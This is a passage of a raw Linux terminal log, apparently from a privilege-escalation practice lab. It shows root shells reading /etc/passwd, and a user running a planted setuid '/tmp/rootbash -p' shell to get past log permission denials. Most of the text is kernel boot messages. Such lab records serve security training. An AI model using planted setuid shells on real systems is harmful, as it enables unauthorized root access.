756histexpand on
757history on
758ignoreeof off
759interactive-comments on
760keyword off
761monitor off
762noclobber off
763noexec off
764noglob off
765nolog off
766notify off
767nounset off
768onecmd off
769physical off
770pipefail off
771posix off
772privileged off
773verbose off
774vi off
775xtrace off
776id
777uid=0(root) gid=0(root) groups=0(root)
778ls
779cat /etc/passwd
780root:x:0:0:root:/root:/bin/bash
781daemon:x:1:1:daemon:/usr/sbin:/bin/sh
782bin:x:2:2:bin:/bin:/bin/sh
783sys:x:3:3:sys:/dev:/bin/sh
784sync:x:4:65534:sync:/bin:/bin/sync
785games:x:5:60:games:/usr/games:/bin/sh
786man:x:6:12:man:/var/cache/man:/bin/sh
787lp:x:7:7:lp:/var/spool/lpd:/bin/sh
788mail:x:8:8:mail:/var/mail:/bin/sh
789news:x:9:9:news:/var/spool/news:/bin/sh
790uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
791proxy:x:13:13:proxy:/bin:/bin/sh
792www-data:x:33:33:www-data:/var/www:/bin/sh
793backup:x:34:34:backup:/var/backups:/bin/sh
794list:x:38:38:Mailing List Manager:/var/list:/bin/sh
795irc:x:39:39:ircd:/var/run/ircd:/bin/sh
796gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
797nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
798libuuid:x:100:101::/var/lib/libuuid:/bin/sh
799Debian-exim:x:101:103::/var/spool/exim4:/bin/false
800sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
801user:x:1000:1000:user,,,:/home/user:/bin/bash
802statd:x:103:65534::/var/lib/nfs:/bin/false
803mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
804bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
805user@debian:/usr/local/bin$
806
807login as: user
808user@10.10.170.166's password:
809Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
810
811The programs included with the Debian GNU/Linux system are free software;
812the exact distribution terms for each program are described in the
813individual files in /usr/share/doc/*/copyright.
814
815Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
816permitted by applicable law.
817Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
818user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
819user@debian:~$ cat l33t.txt
820user@debian:~$ ls
821l33t.txt myvpn.ovpn tools
822user@debian:~$ cat l33t.txt
823user@debian:~$ ls
824l33t.txt myvpn.ovpn tools
825user@debian:~$ dmesg | grep /var/log/messages
826user@debian:~$ tail -f /var/log/messages
827tail: cannot open `/var/log/messages' for reading: Permission denied
828user@debian:~$ tail -f /var/log/messages | less
829user@debian:~$ tail -f /var/log/auth.log
830tail: cannot open `/var/log/auth.log' for reading: Permission denied
831user@debian:~$ /tmp/rootbash -p
832rootbash-4.1# tail -f /var/log/messages
833Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
834Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
835Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
836Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
837Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
838Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
839Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
840Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
841Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
842Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
843
844
845
846
847
848ls
849^C
850rootbash-4.1# cat /var/log/messages
851May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
852May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
853May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
854May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
855May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
856May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
857May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
858May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
859May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
860May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
861May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
862May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
863May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
864May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
865May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
866May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
867May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
868May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
869May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
870May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
871May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
872May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
873May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
874May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
875May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
876May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
877May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
878May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
879May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
880May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
881May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
882May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
883May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
884May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
885May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
886May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
887May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
888May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
889May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
890May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
891May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
892May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
893May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
894May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
895May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
896May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
897May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
898May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
899May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
900May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
901May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
902May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
903May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
904May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
905May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
906May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
907May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
908May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
909May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
910May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
911May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
912May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
913May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
914May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
915May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
916May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
917May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
918May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
919May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
920May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
921May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
922May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
923May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
924May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
925May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
926May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
927May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
928May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
929May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
930May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
931May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
932May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
933May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
934May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
935May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
936May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
937May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
938May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
939May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
940May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
941May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
942May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
943May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
944May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
945May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
946May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
947May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
948May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
949May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
950May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
951May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
952May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
953May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
954May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
955May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
956May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
957May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
958May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
959May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
960May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
961May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
962May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
963May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
964May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
965May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
966May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
967May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
968May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
969May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
970May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
971May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
972May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
973May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
974May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
975May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
976May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
977May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
978May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
979May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
980May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
981May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
982May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
983May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
984May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
985May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
986May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
987May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
988May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
989May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
990May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
991May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
992May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
993May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
994May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
995May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
996May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
997May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
998May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
999May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1000May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1001May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1002May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1003May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1004May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1005May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1006May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1007May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1008May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1009May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1010May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1011May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1012May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1013May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1014May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1015May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1016May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1017May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1018May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1019May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1020May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1021May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1022May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1023May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1024May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1025May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1026May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1027May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1028May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1029May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1030May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1031May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1032May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1033May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1034May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1035May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1036May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1037May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1038May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1039May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1040May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1041May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1042May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1043May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1044May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1045May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1046May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1047May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1048May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1049May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1050May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1051May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1052May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1053May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1054May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1055May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1056May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1057May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1058May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1059May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1060May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1061May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1062May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1063May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1064May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1065May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1066May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1067May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1068May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1069May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1070May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1071May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1072May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1073May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1074May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1075May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1076May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1077May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1078May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1079May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1080May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1081May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1082May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1083May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1084May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
1085May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
1086May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1087May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
1088May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
1089May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1090May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1091May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1092May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1093May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1094May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
1095May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
1096May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
1097May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1098May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1099May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
1100May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
1101May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
